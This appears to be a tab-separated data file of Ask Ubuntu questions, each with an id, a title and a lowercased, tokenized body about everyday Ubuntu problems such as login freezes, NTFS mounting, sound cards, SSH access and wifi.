27244	problem on login : freeze just before user selection	i 'm using ubuntu 10.10 and when i login it shows my login 's wallpaper an appears the window where i select my user without showing it and then gets frozen . no mouse response , no keyboard responde ( even if i try to num/caps lock ) . i tried with safe mode and same thing happens , but in that case it freeze when trying to load some usb stuff , i tought it was my usb headset or my mouse so i disconnected them but does n't works . any advice on how to fix this , how to login to try an update or how to post more information ?
27247	what flash button generators are there ?	i have a client that wants to have flash buttons on their website . as much as i hate flash , i am trying to comply with their request . i have not been able to find a single flash button generator for ubuntu at all . can someone point me in the right direction ?
27251	how to mount a directory inside a fs instead of the whole fs ?	i 've got an ntfs partition which i never need as a whole . when using it from ubuntu i only need a specific directory of it which i like to have mounted into a dedicated directory under my linux fs root . can i specify it in fstab ?
27254	where can i get `` da360c64005e0276 '' public key for `` ppa.launchpad.net maverick release '' ?	when i apt-get update i get the following error : w : gpg error : http : //ppa.launchpad.net maverick release : the following signatures could n't be verified because the public key is not available : no_pubkey da360c64005e0276 how to fix this ? where can i find this key to import it ?
27258	importing pkcs # 12 ( .p12 ) files into firefox from the command line	i 've posted this question up on # ubuntu and # firefox forums , and really could do with some help.. anyone know where i could look or help with the answer . i 'm hoping the power of social media will come through… i have a need to perform the following action : firefox 3.6.x : quote : open edit - > preferences - > advanced - > encryption - > view certificates - > your certificates - > import however i need the same functionality from the bash command line . so far i 've established that the following command is supposed to be used : certutil -a -t “u , u , u” -d /home/df001/.mozilla/firefox/qe5y5lht.tc.default/ -n “mycert” -i client.p12 this executes with no isses , however , does n't show up in any firefox certificate store . however , i have noted that prior to running this command , i have a cert8.db key3.db and secmod.db file in the above folder . after running the command the certutil seems to have created a cert9.db , key4.db and pkcs12.txt file listing the contents using the command : certutil -l -d sql : /home/df001/.mozilla/firefox/qe5y5lht.tc.default/ does seem to confirm my attempts of importing files into a certificate folder of some kind have worked . because i get certificate nickname trust attributes ssl , s/mime , jar/xpi thawte ssl ca „ go daddy secure certification authority „ thawte sgc ca „ entrust certification authority - l1c „ my nero ct , c , c mynero p„ davidfield - internet widgits pty ltd u , u , u so , having tried this , and heading back over to the internet , i came across this command : pk12util -d /home/df001/.mozilla/firefox/qe5y5lht.tc.default/ -i client.p12 -n “david field” -p “cert8.db” this again , appears to be importing something somewhere , however , again , viewing certs from the firefox interface does n't show the imported cert . i 'm surmising here on reading that the certutil and pk12util are creating a new nss database , which firefox is n't reading . so my question is , how can i get the p12 cert from the command line so it displays in the firefox certificate manager interface ? why have i posted this here ? why not post on the firefox forum ? well i will copy and post the same question there as well , however the ability to use the command line to do this is important , as i have potentially 2000 machines which will need a user cert imported into firefox via a p12 file . i need to do this in the form of a script , i thought the hard part was going to be making the p12 file from the microsoft 2003 ca , turns out thats easy . i ca n't just import via the gui and copy over cert8.db x 2000 , i ca n't ask users to use the ca web interface as its for vpn access , the users are off site , and they need the vpn to get to the cert server.. is there any person out there who can help ? by the way , i do n't have the tor button installed .
27259	problem installing oracle 10g express edition	i have installed oracle 10g express edition in ubuntu 10.10 and it does n't show or ask to give my password during installation . when i click on `` start database '' it gave the warning `` operation failed , abhi is not a member of 'dba ' group . '' and when clink on `` run sql command line '' it shows /usr/lib/oracle/xe/app/oracle/product/10.2.0/server/bin/nls_lang.sh : 114 : [ [ : not found when i click on `` goto database home page '' , it opens mozilla 's `` ubuntu google search page '' . can anyone help me get my oracle to work or tell me how to remove that because it is also not getting removed . i tried all the commands that are given as suggestions by ubuntu . please help me because i do n't want to format my ubuntu .
27261	folders in home of ubuntu minimal install	installing a minimal version of ubuntu does not have the usual folders of documents , downloads , etc . in home . is there a way to have them just as it is in regular installs ?
27270	increasing scroll speed	i 've recently switched to ubuntu , and the one thing that has been bothering me is the scroll speed , which i ca n't seem to change . in windows i used to have it set around 7 lines , but it seem to be around 3 on ubuntu , and unchangeable . how can i change the speed ?
27281	reinstall sound preferences	i am running 10.10 and it has been a nightmare getting my x-fi soundcard to work with it . but i finally have sound coming out of 1 speaker . anyway , somehow during the whole ordeal of trying to get the sound to work i removed sound preferences ( system â preferences â sound ) where you can change the sound from mono to surround . can anyone point me in the direction of how to get this back ? or a good replacement app would do .
27283	how do i set up a server for ssh ?	at my workplace ( a university ) we have two ubuntu servers . one is a teacher server and the other is a student server . i am currently setting up a new server to replace the existing teacher server . the new server is currently online and i am trying to get it setup so i can ssh into it from my home . right now , i can ssh into the existing teacher or student server and then ssh into the new server . however , i can not ssh directly into the new server . what must i do so that i can ssh directly into the new server ? thank you very much in advance for your time .
27284	using desktopcouch without ubuntu one ?	i want to know if it is possible to use desktopcouch without ubuntuone , but with a local couchdb server . i found a pairing tool , but this crashes , when i try to pair two computer . i can find the local desktop couches with the avahi zeroconf browser and it should be possible to find them with python and start a replication to make a long story short : i want to sync desktopcouch databases in my local network without ubuntu one . is that possible ?
27287	ntfs and ntfs-3g	i have a netbook with ubuntu netbook 10.04 and a desktop with mint 10 ( ~ ubuntu desktop 10.10 ) both of them have read/write ntfs partitions mounted via /etc/fstab . and it works fine . ive read on net , google , forums , and several posts here , that ntfs-3g is the driver that allows you to have full access to an ntfs partition , that it is new , great , powerful , yada-yada . but ... my entries use plain ntfs , no mention of -3g , and they still work perfectly as read and write . am i already using ntfs-3g ? does 10.04 onwards use it `` under the hood '' ? how can i check that in my system ? should my /etc/fstab entries should use `` ntfs-3g '' as the fs ? why some posts refer to mount ntfs , while others say mount ntfs-3g ? im really confused about where should i use fs-type names ( ntfs ) or driver names ( ntfs-3g ? ) . or is it irrelevant now , and ntfs is always an `` alias '' or something for ntfs-3g nowadays ? ive read some posts her , from oct-10 and nov-10 e that `` announce '' that ntfs-3g `` finally arrived '' ... thats way post-lucid 10.04 . could someone please undo this mess in my head , and explain the relation between ntfs and ntfs-3g , what is the current status ( 10.04 and 10.10 ) , where should i use each , etc ( regarding mount , fstab , etc ) ? sorry for the long , confusing , redudant text ... im really getting sleepy
27290	desktop effects could not be enabled on an asus ul50vg	i 've got a problem with my graphic card . when i try to enable desktop effects on ubuntu 10.10 , `` desktop effects could not be enabled '' message appears . i have asus ul50vg ( nvidia g210m ) . i do n't use any xorg.conf file because when i generate it through nvidia-xconfig , only terminal appears after boot . do you have any idea how to solve that problem ?
27295	make shortcut for navigational functions	is there anyway to create shortcuts for functions like home , end , pg up , pg down , etc ? i frequently use the aforementioned keys , however those keys are only available when the numpad is disabled - there is no dedicated keys for those function on my laptop . i was thinking of using the fn key to trigger them even when the numpad is enabled .
27299	enabling dhcp without being connected	i was installing ubuntu server the other night and i was not able to hook up to the network while installing because i do n't have a monitor for my desktop machines . i had to go into the living room and connect to the hdtv instead . this leaves me without network connectivity . when installing it asks how i would like to set up the network . i would like to enable dhcp but it tries to detect a gateway when i do this and obviously it does n't find anything . it wo n't let me move on without setting up an ip manually at that point . is n't there a way i can enable dhcp for the next time it boots up instead ? why the need for it right then and there ?
27301	i 'm using pencil evolus 1.2 gtk and i ca n't see the grid	screenshot : why is the grid not showing up ?
27303	how do i recover a .ogv on ext4 ?	i have very a simple question . how to recover a .ogv file on my /home ext4 partition ? i overwrote the .ogv file ( i confused input and output in arista transcoder ) . i did research . testdisk can undelete files on fat and ntfs , but not on ext4 . photorec does not support .ogv recovering . foremost also does not support .ogv more info : the file is located at : /home/gasper/video/webcam/2011-02-02-181200.ogv
27305	fonts totally unreadable	i 've just upgraded from 10.04 to 10.10 and my fonts are all just small rectangles with nothing in them . they are completely unreadable . even the fonts in the terminal . thank god the fonts in my chromium were ok , because i would n't be able to find this site or write this message . so far i 've tried to use the appearance - > font thing and it does n't work . for some reason there was an error with the fonts during the installation . please help , this is an utter nightmare ...
27306	ubuntu one android contacts app -- last sync failed	on my htc desire i pressed `` sync all '' and at about the 77th contact it just said `` last sync failed '' . why did it fail ? what could the problem be ? thanks .
27312	bookmark pdf and djvu files	for pdf : how can i create outlines/bookmarks for and merge them into pdf files in either terminal or in gui application in ubuntu ? for djvu : i know how to do the same thing for djvu files in terminal using djvused . i was wondering if there is some gui based application that can create bookmarks/outlines for djvu files more quickly ? thanks and regards !
27314	script to display all terminal colors	throughout the internet i have seen many people with scripts that prints out a bunch of stuff in all the colors defined in ~/.xdefaults . however when i try to use these , i always get error : bad substitution . does anyone have a working script that does the same thing ? it should end up looking something like this :
27317	how do i install an external hard drive ?	i bought a 320gb seagate freeagent go hard drive and i 'm not sure how to install it on my system , i 'm running ubuntu 10.10 . it seems to have recognized it , but now i have an icon on my desktop i ca n't get rid of . ( update : i just 'rebooted ' system and now the external hard drive is n't being recognized at all ! ? )
27320	how do i install freenx server so that it works correctly ?	i 've tried every single possible way of installing the server now , i 've read every how to available and i still ca n't get it to work . please let me know in which step i do wrong . i 'm using ubuntu 10.10 . i will mainly be referring to the following how-to , but also this , and this one . first i add the ppa install freenx download the special freenx package as stated in the howto , fix ownership - install it create custom ssh key copy the file /var/lib/nxserver/home/.ssh/client.id_dsa.key to the client and import it in nomachine ( windows 7 x64 ) check that both the user i will be logging in with and the user nx is in allowedusers in the /etc/ssh/sshd_config file check the port that ssh is listening on login through nomachine with my regular user account in ubuntu i always receive the message `` authentication failed for [ user ] '' when i try to log in . and i ca n't see the user `` nx '' which is said to be created during installation when i look under system- > administration- > '' users & groups '' . can anyone please enlighten me if there is any step that i miss or have misunderstood ? thank you very much ! ( or is there an easier way of enabling remote desktop that it can be used with a windows machine ? i prefer not using vnc because i was hoping of being able to get better performance than that . and when i tried using xrdp i only received a black screen on the client . )
27321	how do i 'mount ' my external hard drive ?	i have an external hard drive that i ca n't get to 'mount , ' the only place on the system i can find info about the drive is in disk utility , under mount point it says it is unmounted !
27326	numpad does n't work after booting up - forced to reconnect usb keyboard after startup	i 've tried this on two different usb keyboards - both of which work fine on a different computer running windows xp . for some reason , the numerical keypad does n't work probably immediately after booting up - neither the numbers work , nor the 'home ' commands and so on that you can use with the numlock off . it does n't make a difference whether i press numlock on or off - the keypad does n't work correctly no matter what state this is in . however , once i 've booted the machine i can disconnect/reconnect the usb connector for the keyboard , and it will work exactly as expected . i 'm running gnome on ubuntu 10.04 . the only other usb devices connected is a mouse - and i 've experienced no problems with that . this is a direct connection to the box ( not via an external usb hub )
27333	fix pavucontrol alsa mixer with creative card	i have been desperately trying to get my creative x-fi soundcard to work with my 10.10 install and i am almost there ! i have 1 speaker working and when i open volume control i see that my device is creative x-fi ( also mixer ) . however , it appears to be stuck on mono . when i open pavucontrol i get a message that says connection failed : connection refused and it exits . before it closes i can see that playback is set to mono but it wo n't let me change before it closes . can someone help me over this last hump ? i am running 32 bit 10.10 any advice is much appreciated .
27339	what is tty7 in the commandline ?	recently i have been playing around in terminal and typed the who command . as i see my user name and date , i do n't know what tty7 or what this pts/0 is , can somebody explain this to me ?
27343	recommended workflows for apache virtual hosts ?	i do a lot of local web development work on my ubuntu machine , and i 'm constantly setting up virtual hosts in apache . i do n't need to do hard core server management , but i am getting tired of the repetitive process of manually adding config directives to files in /etc/apache2/sites-available/ and then updating the /etc/hosts file . is there a more efficient or more automated way to do all this that i 'm missing ? maybe something like rapache but that 's actually working ?
27346	winsplit revolution for openbox ?	when on windows i commonly use winsplit revolution to arrange my windows . i found a plug-in for compiz fusion that does a similar task , but i am using openbox . are there any programs that can do the same thing ( press hotkeys - > move + resize window ) for openbox ?
27349	how do i compress a directory ?	i 'm trying to compress a directory and ftp it to a windows ftp . i have tried every tar command i can find to compress a directory . it appears to be ok. then i transfer it and view it 's contents using winrar . winrar keeps telling me the file is corrupted . i have viewed other .gz or .bz2 files using winrar but for some odd reason i ca n't get it to work . i would prefer just to have it zip the files so they have a .zip extension but even then when i try to browse it 's contents both windows and winrar claim it 's corrupt . does anyone else have a suggestion as to something else to try ?
27352	ruby script runner for ubuntu gedit	i have this java script runner installed in my gedit external tools : # ! /bin/sh cd $ gedit_current_document_dir if javac $ gedit_current_document_name ; then java $ { gedit_current_document_name % \.java } else echo `` failed to compile '' fi i tried modifying to it to something like this # ! /bin/sh cd $ gedit_current_document_dir ruby $ { gedit_current_document_name % \.rb } but it does n't work . i may have missed something , i do n't know what because i do n't do bash scripting . hehe
27354	how to customize `` move to '' directory action structure ?	when i right click on one directory there is move to action , and there is only two options , home folder and desktop is it possible to customize this action to many more or another one ?
27355	how do i get help for `` echo '' or other bash commands ?	man echo works . but out of curiosity , does echo have something similar to a -- help flag/parameter ?
27358	dns server configuration is changed automatically	the default dns server was running too slowly , so i changed the configuration by adding a nameserver . /etc/resolv.conf : nameserver 202.102.192.68 nameserver 210.45.240.99 domain ***edu.cn search ***edu.cn but the file will is changed back to the default automatically after a while . is there any method to solve this problem ? thanks !
27362	how to only install updates from a specific repository ?	how do i limit the updates that are installed to those from a specific set of repositories ? is this at all possible ?
27367	does dconf use desktopcouch as database backend ?	the title says everything . does dconf use desktopcouch as database backend ? will it be possible to sync the configuration ? and is it possible to select , what should be synced ?
27375	remote connection problem	hello i have ubuntu 10.04 installed with mysql on it and i have a problem with remote connection . when i connect through putty it works but sometimes it looks like it hangs for example when i execute the command ln -- help . also with mysql connection when i execute a simple query like show processlist ; it works , but for example select * from table not always , if the table does n't have many rows it works but if it has let 's say more than 20 the query looks like it keeps working and never ends . it 's connected but i ca n't do many things remotely . added : i connect using putty from other windows pc , server is not overloaded . when i work at the same time directly on ubuntu i can do everything . remotely not .
27377	how to get 32 bit version of libraries on ubuntu 64 bit ?	i 'm trying to compile a program which uses google 's v8 library ( which is 32 bit ) . therefore any library i use within my program also has to be 32 bit . where can i download the 32 bit version of libraries on ubuntu 64 bit ? more specifically , i 'm looking for the libnotify 32 bit version . this is the errors i am getting right now : g++ -o shell -m32 shell.o -l../v8 -lv8 -lpthread `pkg-config -- libs libnotify glib-2.0` /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../libnotify.so when searching for -lnotify /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../libnotify.a when searching for -lnotify /usr/bin/ld : skipping incompatible /usr/lib/libnotify.so when searching for -lnotify /usr/bin/ld : skipping incompatible /usr/lib/libnotify.a when searching for -lnotify /usr/bin/ld : can not find -lnotify collect2 : ld returned 1 exit status thanks !
27378	what is the recommended partition set up ?	hi all , i was surfing and i noticed a page talking about a separate /data partition . now i 'd always separated my /home partition for an easier transition to a new ubuntu installation . what is the recommended partition set up for the smoothest ubuntu experience ?
27381	how to edit pdf metadata from command line ?	i need a command line tool for editing metadata of pdf-files . i 'm using a aiptek mynote premium tablet for writing my notes and minutes on this device , import them later and convert them to pdf automatically with a simple script using inkscape and ghostscript . is there any command line tool to add some categories to the pdf 's metadata , so i can find the pdf later ( e.g . with gnome-do ) by categories ? update : i tried the solution with pdftk and it works , but it seems that gnome-do does n't take care of pdf-metadata . is there a way to get gnome-do to do that ?
27383	upgrading a dual-boot system hdd	i dual-boot my laptop due to lousy vm performance , and have a new 500gb/7200rpm drive coming in to replace the stock 320gb/5400rpm drive . i have the drive set up in three partitions : one for the win7 system files , one for storage , and the third as the ext4 linux file system . the system file and storage partitions are both ntfs . what i 'm planning to do is use the system image creator built in win7 , then move that over to the new drive . however , how can i migrate the ubuntu partition , and how do i make sure that the grub bootloader is n't overwritten by the windows loader ?
27385	how to start a job at precise time ?	i want to start a recording job at a precise time . as i understand cron only guarantees a job to be started within a minute . one possible solution is to start the cron job earlier and than wait until the precise time . what other possibilities do i have ?
27392	hide mounted volume icon on the desktop ?	i have a 10.10 installation . /etc/fstab mounts a partition to ~/desktop and my desktop icons work fine . however mounted volume icon always appears on desktop . altough i have unchecked volumes_visible option in gconf-editor , still icon is shown . is there a change in 10.10 ?
27397	how can a free , proprietary application be submitted to the software center ?	i 'd like to suggest to the developers of simfy that their desktop application be submitted to the software center . how should they go about doing this ?
27398	best way to learn how to set up openvpn on amazon ec2/a vps ?	what is the best way to learn how to set up a vpn using openvpn on an amazon ec2 server/a vps ? what level of proficiency is required in linux system administration for this ?
27402	apt-get vs. aptitude .vs synaptic compatibility	i had been a debian user for almost 3 years ... but memories have gone really fuzzy ... i `` kind of '' remember that i should only use one of the package managers ... either apt-get , aptitude , or synaptic , but not the three in combination 'cause there may be conflicts , they do n't mix well . i do n't know where i have heard it , but it has left its memory print . so i just want to check with you if it is really not advised or if it is an urban legend and it is completely safe . could you confirm this ? is the cleanest way of installing a package is still using the command checkinstall before invoking dpkg ?
27403	terminal which remembers its state	having used gnome-terminal i noticed that it does not remember its state , once closed . i would like a terminal which remembers its state , this includes the title of the tabs and the current directory in which i was . iirc the konsole of kde3 did this . so i installed konsole ( the current version which comes with ubuntu 10.10 ) however it does not seem to remember it 's state either . : (
27404	will nvidia be supported in natty narwhal with unity	i have been trying to get natty running on my desktop pc with a nvidia 8400gs card but not having much luck . i can see on the forums that it is related to the x server version and the nvidia driver . will i be able to install 11.04 with unity desktop using my nvidia card ?
27405	what is the building photographed in this stock wallpaper ?	i 'm sure i 've seen a picture of the full building somewhere . the image is a blue-tinted display of the building 's facade - facing into a blue sky . it 's a part of the stock wallpapers in ubuntu 10.10 ( maverick ) . can someone help me identify this building ? i ca n't be the first - or the only - person to be interested in knowing .
27409	how do i set the system date/time format from the command line ?	apparent i should set lc_time to en_dk ( why danish ? i do n't want danish months ! ) but nothing i 've done manages to change the output of locale .
27410	migrating from evolution to thunderbird	i would really like to switch over to thunderbird from evolution . i have had a look around and have n't found a good up to date how to for migrating . i have quite a lot of emails and filters and would like to make the transition as painless as possible . thanks for any help .
27416	record 8 separate line in channels from m-audio delta 1010 card	i want to record the 8 separate line in channels from my m-audio delta 1010 card . the card is recogniced nicely and a can record a single channel via arecord -d 10 -f cd -t wav -d channel1 out2.wav . i 've set up the different channels in ~/.asoundrc . now if i want to record a second channel in parallel ( arecord -d 10 -f cd -t wav -d channel2 out2.wav ) i get the error arecord : main:564 : audio open error : device or resource busy as i understand the delta 1010 is a single access card , so only one application can access it at a time . is this correct ? the next step was to configure a dual channel input in .asoundrc # envy24 channel 1+2 only pcm.test { type plug ttable.0.0 1 ttable.0.1 1 slave.pcm ice1712 } which works ok when i do a arecord -d 10 -f cd -t wav -d test -c 2 out.wav ( btw can anyone point me to a tool to split a multi channel wav into a file per channel ? ) but when i want to record the channels separately with ( -i option ) arecord -d 10 -f cd -t wav -d test -c 2 -i channel1.wav channel2.wav i get no recordings . did i miss something with the configuration or what are my options to record all 8 channels via arecord . i 've no experience with jackd . is it an option to install jackd and record the line ins via jackd ?
27418	what is a security update ?	why are some updates called important security updates ? how are they different from other updates ? is my system insecure , if i do n't install them ? how can there be very frequent security updates ? does it mean my ubuntu is very unstable or insecure ?
27423	security in hybrid cloud	how do we ensure security while setting up a hybrid cloud ? for example , if i want to use ec2 or rackspace , how can i make sure that the connectivity between the private and the public cloud is secure ? is a vpn necessary ? if so , do we have to set it up manually ?
27425	laptop wo n't `` hibernate '' then `` thaw ''	can anyone help me with a suspend-resume problem ? i have two identical thinkpad laptops ( 7764cto ) . one works fine . the other will not `` hibernate '' ( suspend-to-disk ) and `` thaw '' ( restart after suspend-to-disk ) . the alternative `` sleep '' ( suspend-to-ram ) and `` resume '' ( restart after suspend-to-ram ) works fine . i do n't find any log contents ( that make sense to me ) to tell me : did suspend-to-disk reach successful completion ? if not , what went wrong ? did start-up successfully detect the need to restart-from-hibernate ? if successful suspend , why did detection fail ? did restart-from-hibernate fail its processing ? what was going on at the time of failure ? i found postings about suspect modules and problem devices ( where suspend-to-xxx matters ) and made some progress , but the fact that one laptop works while one fails is driving me crazy . completely stumped .
27427	how do i correctly group albums in banshee ?	i use banshee to manage & play my music ( most of which came from emusic and cds ) . i consistently have problems getting songs from the same album to appear as one album . this is particularly a problem with compilations , i.e . multiple artists on the same album . when i transfer songs to my android phone ( nexus s ) , this issue follows . how do i edit files so that banshee correctly identifies all the songs as belonging to the same album ? i am using the latest banshee via the unstable ppa .
27431	video freezes every few seconds	i have problems playing videos on my ubuntu 10.10 machine . the video freezes every 20-25 seconds , while i could still hear the audio . i use totem movie player ( gstreamer ) & have nvidia on-board graphics card & amd dualcore processor . after some 5-10 seconds , the videos resume skipping the hung portion . but , i can hear the audio of that part ! i 've tried it with smplayer ( gui ) , vlc & kaffeine . but , the same problem ... i recently uninstalled the nvidia drivers and since then , not even for a second , no video hung ! so , i thought its the problem with the proprietary nvidia drivers . but , since its uninstalled , i 'm not able to get the desired desktop resolution & effects . so , is there any way i can work it out ?
27432	configuring ethernet network	i 've got a wired network connection and if i 'm using network manager ( hereafter `` nm '' ) everything works fine except for the hardware address ( it does n't change ) . i 'm thinking of using /etc/network/interfaces . so , i added some code and it looks like this : auto lo iface lo inet loopback auto eth1 iface eth1 inet static address # corresponding value netmask # corresponding value gateway # corresponding value hwaddress # corresponding value after restarting networking i get the following message : *reconfiguring network interfaces ... # here some help code appears failed to bring up eth1 . the default interface that works with nm is eth0 . please advise on how to handle the problem .
27435	how can i change or shut off a screensaver setting without using gnome	i set a screensaver that freezes my computer and because changing the screensaver using the gnome desktop displays the screensaver it locks up my computer before i can make the change . i would prefer to set the screensaver off .
27439	acpi shutdown not working from virtualbox	i have several ubuntu 10.10 ( maverick meerkat ) servers running in virtualbox 4.0.4 ( however this issue was also present in virtualbox 3.2.8 ) . when i issue an acpi shutdown to the vms , nothing happens . i have added acpi=force to the top of /etc/default/grup ( and ran sudo update-grub ) , and i have added agm_power_off=1 to /etc/modules . i am at a lost for what to try next .
27445	wifi does n't connect if i 'm upstairs	i 'm finding that wifi connects when i 'm in the living room , where the internet router etc is . but if i try to connect upstairs it is a no go . booting in windows 7 ( dual boot : d ) i find that wifi connects . i find this very confusing and have it since the install . please help ! kind regards . # sudo lshw -c network *-network description : wireless interface product : pro/wireless 5100 agn [ shiloh ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:21:5d:1a:63:58 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.35-26-generic firmware=8.24.2.12 ip=10.0.0.4 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:49 memory : de200000-de201fff hope it helps ! hello guys , just tried to connect internet upstairs and to my surprise it does connect . do n't know exactly why . only thing i 've done recently is input the codes said bij oli and installed jupiter and laptop-mode-tools . i really do n't know if this can effect my internet but it 's the only thing i can think of . thanks for all the help , really appreciate it : ) ps if someone thinks it might be helpful for others i would like to help find a 'real ' solution to this problem . just post down what i need to post here and i will try my best to help . /sbin/iwlist wlan0 scan wlan0 scan completed : cell 01 - address : c0:3f:0e:50:4e : b8 channel:1 frequency:2.412 ghz ( channel 1 ) quality=65/70 signal level=-45 dbm encryption key : on essid : '' ziggo927471 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000011fd34ba82b extra : last beacon : 83630ms ago ie : unknown : 000b5a6967676f393237343731 ie : unknown : 010882840b162430486c ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a7e181bffff000001000000000000000000000000000000000000 ie : unknown : 3d1601051300000000000000000000000000000000000000 ie : unknown : dd7c0050f204104a00011010440001021041000100103b00010310470010a2b0fce4210b6411bc4c06a6f7ec31d21021000d4e4554474541522c20496e632e10230009574e5233353030763210240009574e523335303076321042000230311054000800060050f204000110110009574e52333530307632100800020084 ie : unknown : dd090010180201f0050000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c337e181bffff000001000000000000000000000000000000000000 ie : unknown : dd1a00904c3401051300000000000000000000000000000000000000 using grep `` cell does n't bring up anything protocol : '' ; /sbin/iwconfig wlan0 protocol : : bestand of map bestaat niet wlan0 ieee 802.11abg essid : '' ziggo927471 '' mode : managed frequency:2.412 ghz access point : c0:3f:0e:50:4e : b8 bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=67/70 signal level=-43 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 grep `` sensitivity '' -b2 also does n't bring anything up found one curious thing : it does connect upstairs but only close to my door . everywhere else in my room is a no go , while windows does connect .
27447	google earth and $ browser environment variable	when i click on a picture in google earth to view it in full-screen , it shows me this error message : could not launch any web browser . please make sure you have set the $ browser environment variable to the filename of the web browser we should launch ! what is the best way to set this environment variable globally for all users ?
27456	block access to specific applications	i would like to give several users rights to a computer running ubuntu to do most administrative functions such as add/remove programs , save files , make settings changes , etc . however , i would like to block them from using several specific applications . is this possible , and how would i do so ? to provide a bit more detail : i am trying to set up gnome nanny to block adult websites from my kids ' computer . i 'd like to give them full access to the computer accept for gnome nanny . windows has a program called k9 that can not be turned off or uninstalled unless the user has the password even if the user is an admin . sounds like this is n't available on ubuntu without a rather involved process of setting permissions on a large list of applications and functions to mimic admin rights .
27459	why ca n't i boot from portable hd ?	i 've been trying to get ubuntu 10.04-lts 32-bit desktop installed onto a 250gb freeagent go drive from seagate . i 've been able to install onto a usb flash drive and boot successfully from this . i have installed ubuntu onto the jump drive using universal usb installer , and this was a total success in terms of getting ubuntu to run off a flash drive . i was unable to accomplish this with the portable hdd . i then , following instructions , attempted to install the os onto the hdd once booted up from the flash drive . after installing the os on the hdd , the computer would simply not load the os when the hdd medium was selected for booting from . however , as there is no system- > preferences- > removable drives and media i could not complete this step . is this vital ? how do i do this under ubuntu 10.04 ? i have formmated the mbr on the hdd and repeated the above , still with no success . i have also browsed some forums that mention there may be something related to spin-up speeds , but nothing explained in detail the issue or how to solve it , and i 'm not familiar enough with system booting to understand if this could be an issue . basically , what i 'm trying to do is get ubuntu to boot off the hdd , i 've attempted several things , and the result is , after selecting the hdd from bios , the os never starts booting ( after waiting upwards of ten minutes ) . i just have a white cursor blinking . i can always get it to boot from the jump drive . related question
27461	emerald window decorator fails to start ... sometimes	i 'm running ubuntu 10.04 and i have some weird issues with emerald not starting sometimes , leaving me `` chromeless '' windows . i can , of course then start emerald with emerald -- replace > /dev/null 2 > & 1 & \ disown $ ! , but it 'd be really nice to just make sure it starts no matter what . currently , emerald is being started by compiz , i believe , as i set emerald as my decorator using compizconfig settings manager : is there a better way to do this so that we can ensure that it starts every time ?
27464	ca n't run thunar-volman	whenever i try to run thunar-volman ( from a terminal ) , i get there following error : thunar-volman : must specify the new hal device udi with -- device-added . how can i get thunar-volman to work ? or is there another way to view mounted drives in thunar ?
27467	get creative soundcard working correctly	i am trying to get sound going on my fresh install of 10.10 . i have a creative fatlity branded sound card . my alsa information . most things seems to be working out of the box , once i turned off my onboard sound in my bios the soundcard kicked in . however , the system sounds are n't working ( i love those drums and the road runner sound when you press backspace ) . also , with a 7.1 setup my center channel and subwoofer do n't work at all . all other channels are working like a champ . so i am trying to accomplish two things , get system sounds working and get center/sub channels working . how should i try to fix this ?
27470	ghc6 install trouble : hgetcontents : invalid argument ( invalid utf-8 byte sequence )	having trouble installing ghc6 . here 's what seems to be the relevant error that comes up when i try to ( apt-get|aptitude ) install ghc6 : a package failed to install . trying to recover : setting up ghc6 ( 6.12.1-13ubuntu1 ) ... ghc-pkg : /home/opm/.ghc/i386-linux-6.12.1/package.conf.d/unix-compat-0.2-edefa7bced91ebe610d455bab466e200.conf : hgetcontents : invalid argument ( invalid utf-8 byte sequence ) ( here 's the full output , if you 're interested : http : //paste.ubuntu.com/566475/ ) this still happens after apt-get clean and apt-get update . my searching around has not really helped me understand what 's going on , except that it might be caused by a mismatch in locale . so , here 's the output of locale too : lang=en_us.utf8 language=en_us : en lc_ctype= '' en_us.utf8 '' lc_numeric= '' en_us.utf8 '' lc_time= '' en_us.utf8 '' lc_collate= '' en_us.utf8 '' lc_monetary= '' en_us.utf8 '' lc_messages= '' en_us.utf8 '' lc_paper= '' en_us.utf8 '' lc_name= '' en_us.utf8 '' lc_address= '' en_us.utf8 '' lc_telephone= '' en_us.utf8 '' lc_measurement= '' en_us.utf8 '' lc_identification= '' en_us.utf8 '' lc_all= any ideas ? additional background : this all seems very strange to me , because i used to have ghc6 installed correctly -- i use xmonad as my main window manager most of the time . i tried to install haskell-platform ( through apt ) , which failed and told me that there was something wrong with ghc6 , and so i reinstalled ghc6 and began to get the above error message . ( originally posted here to superuser , until i remembered today that this se site existed . )
27471	problem with gimp : bad resolution	i have some issues with gimp . something about the resolution . sometimes you just can see the color change steps in gradients for instance . something similar affects anti-aliasing . is this a bad installation problem , a gimp limitation , a system configuration issue , or ... ?
27472	what can i use to chat on battle.net ?	in the past there was a pidgin plugin that allowed users to chat on battle.net . does such a thing still exist ?
27473	why is evince not displaying application fonts/text for me ?	any time i use evince , it just shows boxes where all the text should be . instead , it uses the box symbol which i know stands for not being able to find a character . this problem occurs on every menu , and makes it impossible to tell what 's going on in any part of the application . i 've tried googling for this problem , but my -fu is weak or it 's hard to search for . i 'm pretty tech-literate , and i 'm running a fairly stock 10.10 install with gnome .
27476	how to install eclipse j2ee ide from a tarball ?	i have downloaded eclipse 3.6.1 as a tar.gz file from eclipse site . then i extract using cmd : tar -zxvf eclipse-jee-helios-sr1-linux-gtk.tar.gz after execute this cmd i got eclipse folder in this there is eclipse file . when i double click on this eclipse file i 'm getting following error : could not display `` /media/d-developme/eclipse/eclipse '' . there is no application installed for executable files is there any solution for it ?
